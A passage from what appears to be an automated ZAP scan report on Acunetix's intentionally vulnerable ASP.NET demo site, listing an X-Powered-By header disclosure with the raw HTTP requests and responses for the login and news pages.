style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/login.aspx
Method	POST
Parameter
Attack
Evidence	X-Powered-By: ASP.NET
Show / hide Request and Response
Request Header - size: 405 bytes.	POST http://testaspnet.vulnweb.com/login.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/login.aspx Content-Length: 1161 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 1,161 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv%2BQ8XadeewSqHhJbH9z4dvJw%3D%3D&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=%2FwEWWwLoz%2FfGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBG0lSndyVrygwyPPM%2FuCBtd%2Bn7UP&tbUsername=ZAP&tbPassword=ZAP&cbPersistCookie=on&btnLogin=Login
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT Content-Length: 13433
Response Body - size: 13,433 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>login</title> <meta name="vs_showGrid" content="True"> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="frmLogin" method="post" action="login.aspx" id="frmLogin"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv+Q8XadeewSqHhJbH9z4dvJw==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['frmLogin']; if (!theForm) { theForm = document.frmLogin; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="C2EE9ABB" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWwLoz/fGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBG0lSndyVrygwyPPM/uCBtd+n7UP" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top" align="center"> <TABLE id="Table2" cellSpacing="0" cellPadding="5" border="0" align="center" class="FramedForm"> <TR> <TD>Username:</TD> <TD align="right"> <input name="tbUsername" type="text" value="ZAP" id="tbUsername" class="Login" /></TD> </TR> <TR> <TD>Password:</TD> <TD align="right"> <input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD> </TR> <TR> <TD align="left" colSpan="2"><input name="cbPersistCookie" type="checkbox" id="cbPersistCookie" checked="checked" class="classic" /> Remember me </TD> </TR> <TR> <TD></TD> <TD align="right"> <input type="submit" name="btnLogin" value="Login" id="btnLogin" /></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=0
Method	POST
Parameter
Attack
Evidence	X-Powered-By: ASP.NET
Show / hide Request and Response
Request Header - size: 421 bytes.	POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=0 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=0 Content-Length: 6507 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 6,507 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA%2BPHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc%2BICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8%2BbmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A%2BICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A%2BICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A%2BICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA%2BLSBTdXBwb3J0IGZvciBJUHY2PGJyIC8%2BICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8%2BICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8%2BICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA%2BVGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E%2BLjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A%2BICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BVXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc%2BQWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BRm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A%2BZAIJDw8WAh4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg%2FaWQ9MGRkAgsPFgIeA3NyY2RkZPOqH8VRVGFvH0VwpHODsgDXKZTi&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwKP1p3RBAL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBNw4dcQo8tH%2F%2FaNq1Q9scKgXRi5G
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:17 GMT Content-Length: 22875
